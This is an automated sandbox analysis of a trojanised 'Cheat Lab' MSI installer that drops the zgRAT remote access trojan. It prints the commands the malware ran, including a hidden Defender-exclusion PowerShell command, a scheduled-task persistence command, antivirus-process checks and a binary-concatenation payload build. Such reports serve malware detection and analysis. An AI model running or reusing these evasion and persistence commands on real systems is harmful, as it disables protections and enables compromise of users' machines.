                        Source: 29.3.Carbon.pif.39a94e8.1.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.5.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39067e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.3a00a80.6.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.3.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.8.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.3a00a80.7.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 31.2.jsc.exe.1390000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.2.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, Strings.csLarge array initialization: Strings: array initializer size 6160
                        Source: 29.3.Carbon.pif.39067e0.4.raw.unpack, Strings.csLarge array initialization: Strings: array initializer size 6160
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeFile dump: connect.exe.10.dr 1073657860
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0090FFC0 NtResumeThread,29_2_0090FFC0
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0096448D: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,29_2_0096448D
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_009518E3 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,29_2_009518E3
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0095EF37 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,29_2_0095EF37
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6d055c.msi
                        Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI695.tmp
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: String function: 00910D80 appears 46 times
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: String function: 0090FD18 appears 31 times
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: String function: 0041A1B0 appears 31 times
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: String function: 0040476F appears 50 times
                        Source: Dns.16.drStatic PE information: No import functions for PE file found
                        Source: Dns.16.drStatic PE information: Data appended to the last section found
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                        Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                        Source: 29.3.Carbon.pif.39a94e8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39067e0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.3a00a80.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.3a00a80.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 31.2.jsc.exe.1390000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, Strings.csCryptographic APIs: 'CreateDecryptor'
                        Source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, Ea7RDL6j6306s6g3fyv.csCryptographic APIs: 'CreateDecryptor'
                        Source: 29.3.Carbon.pif.39067e0.4.raw.unpack, Strings.csCryptographic APIs: 'CreateDecryptor'
                        Source: 29.3.Carbon.pif.39067e0.4.raw.unpack, Ea7RDL6j6306s6g3fyv.csCryptographic APIs: 'CreateDecryptor'
                        Source: classification engineClassification label: mal84.troj.adwa.spyw.evad.winMSI@49/74@3/4
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD581D4 GetLastError,FormatMessageA,11_2_00007FF7BAD581D4
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_009517A1 AdjustTokenPrivileges,CloseHandle,29_2_009517A1
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00951DA5 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,29_2_00951DA5
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_004032B5 GetDiskFreeSpaceExW,SendMessageW,16_2_004032B5
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0095DAC1 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,29_2_0095DAC1
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_004038DD SHGetSpecialFolderPathW,CoCreateInstance,16_2_004038DD
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_00404C1A GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,GetProcAddress,GetProcAddress,wsprintfW,GetProcAddress,16_2_00404C1A
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Cheat Lab Inc
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeMutant created: \Sessions\1\BaseNamedObjects\Winter741
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF2CE.tmp
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                        Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Users\user\Desktop\desktop.ini
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                        Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.2.msi"
                        Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 30FEA9F9E3926AA1391EB6E446524DF5 C
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F28D3D46A9F6C7BEC118E0AE5C649DD3
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss87C.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi86A.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr86B.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr86C.txt" -propSep " :<->: " -testPrefix "_testValue."
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force }
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AF5482846545A3FBF6C3EBE62A323063 E Global\MSI0000
                        Source: unknownProcess created: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\config
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\config
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Register-ScheduledTask -TaskName 'Y29ubmVjdDc0MQ==' -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe') -Trigger (New-ScheduledTaskTrigger -At (Get-Date).AddMinutes(1) -Once) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable) -Force"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k cmd < Roommates & exit
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir 28945
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Dns + Pontiac + Milfhunter + Ruling + Supervisor 28945\Carbon.pif
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Entered + Conferences 28945\w
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif 28945\Carbon.pif 28945\w
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                        Source: C:\Windows\System32\msiexec.exeAutomated click: Install
                        Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: OK
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab Inc
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab Inc\Cheat Lab
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\config
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                        Source: Cheat.Lab.2.7.2.msiStatic file information: File size 3107840 > 1048576
                        Source: Binary string: Z:\7zsfxmm-51139022f6d790da60884077b63b2f265052be0b\Output\Win32\7ZSfxMod.pdb source: connect.exe, 00000010.00000000.2470216171.0000000000426000.00000002.00000001.01000000.00000009.sdmp, connect.exe, 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp

                        Data Obfuscation

                        Source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, Ea7RDL6j6306s6g3fyv.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 29.3.Carbon.pif.39067e0.4.raw.unpack, Ea7RDL6j6306s6g3fyv.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force }
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Register-ScheduledTask -TaskName 'Y29ubmVjdDc0MQ==' -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe') -Trigger (New-ScheduledTaskTrigger -At (Get-Date).AddMinutes(1) -Once) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable) -Force"
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_008F4E68 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,29_2_008F4E68
                        Source: Dns.16.drStatic PE information: real checksum: 0xf5a21 should be: 0x3d92c
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B2ED2A5 pushad ; iretd 6_2_00007FFD9B2ED2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B407564 push ebx; iretd 6_2_00007FFD9B40756A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B40C535 push ebx; retf 6_2_00007FFD9B40C53A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B4D71C5 push ebp; retf 6_2_00007FFD9B4D71C8
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_3_00007FF79D57818A pushfd ; retn 0000h11_3_00007FF79D57818B
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_3_00007FF79D577D0B pushfd ; retn 0000h11_3_00007FF79D577D0C
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD3499C push rbp; ret 11_2_00007FF7BAD349D8
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADACF9D push rdi; ret 11_2_00007FF7BADACFA4
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADAD529 push rdi; ret 11_2_00007FF7BADAD532
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9B2BD2A5 pushad ; iretd 14_2_00007FFD9B2BD2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9B3DADE8 push eax; ret 14_2_00007FFD9B3DAFE1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9B3D5F27 push esp; retf 14_2_00007FFD9B3D5F28
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9B3DAF28 push eax; ret 14_2_00007FFD9B3DAFE1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9B3D3568 push E95E53ABh; ret 14_2_00007FFD9B3D3599
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_0041A1F6 push ecx; ret 16_2_0041A209
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_00419CE4 push eax; ret 16_2_00419D02
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00910DC6 push ecx; ret 29_2_00910DD9
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_019BE0C3 pushad ; iretd 31_2_019BE249
                        Source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, Ea7RDL6j6306s6g3fyv.csHigh entropy of concatenated method names: 'hFEEqEbcYR', 'g38PJ8K3c0', 'KLjExgoVqt', 'uK7EIy74hq', 'qyvE20Kp8S', 'Re8EV9gH2x', 'hBfIKvmKjt', 'fiT6lGqjpY', 'qu86nCICHn', 'Ryg6if8UNr'
                        Source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, Di7ikruKq90A5QE6ix.csHigh entropy of concatenated method names: 'rijWrX6jX', 'ceWMIZ7EW', 'KYGPgj2ds', 'D2iww7kgw', 'L6TzeU1J7', 'XRAa5McJe1', 'T9daaHJGMP', 'dB7amCN7wt', 'ppiaOJnqVl', 'tL7a4MkqYU'
                        Source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, L40WGTESFRlM7HtX2Nl.csHigh entropy of concatenated method names: 'P0GEvEBiq1', 'K4vE93JS2m', 'KgVELXZnKg', 'jnLEtSteI7', 'h4NEZRG9dX', 'lHREfx51na', 'u74EuWB1C5', 'aCpERtciCW', 'z99EWA4xCa', 'eIHEMdvo5N'
                        Source: 29.3.Carbon.pif.39067e0.4.raw.unpack, Ea7RDL6j6306s6g3fyv.csHigh entropy of concatenated method names: 'hFEEqEbcYR', 'g38PJ8K3c0', 'KLjExgoVqt', 'uK7EIy74hq', 'qyvE20Kp8S', 'Re8EV9gH2x', 'hBfIKvmKjt', 'fiT6lGqjpY', 'qu86nCICHn', 'Ryg6if8UNr'
                        Source: 29.3.Carbon.pif.39067e0.4.raw.unpack, Di7ikruKq90A5QE6ix.csHigh entropy of concatenated method names: 'rijWrX6jX', 'ceWMIZ7EW', 'KYGPgj2ds', 'D2iww7kgw', 'L6TzeU1J7', 'XRAa5McJe1', 'T9daaHJGMP', 'dB7amCN7wt', 'ppiaOJnqVl', 'tL7a4MkqYU'
                        Source: 29.3.Carbon.pif.39067e0.4.raw.unpack, L40WGTESFRlM7HtX2Nl.csHigh entropy of concatenated method names: 'P0GEvEBiq1', 'K4vE93JS2m', 'KgVELXZnKg', 'jnLEtSteI7', 'h4NEZRG9dX', 'lHREfx51na', 'u74EuWB1C5', 'aCpERtciCW', 'z99EWA4xCa', 'eIHEMdvo5N'

                        Persistence and Installation Behavior

                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF2CE.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF3FB.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF527.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7E2.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF557.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI695.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4F2F.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5924.tmpJump to dropped file
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeFile created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzQx.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF577.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5963.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF479.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI743.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\DnsJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF3DB.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4E34.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI773.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF507.tmpJump to dropped file
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF38B.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF3AB.tmpJump to dropped file
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeFile created: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI713.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI841.tmpJump to dropped file
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeFile created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzQx.exeJump to dropped file
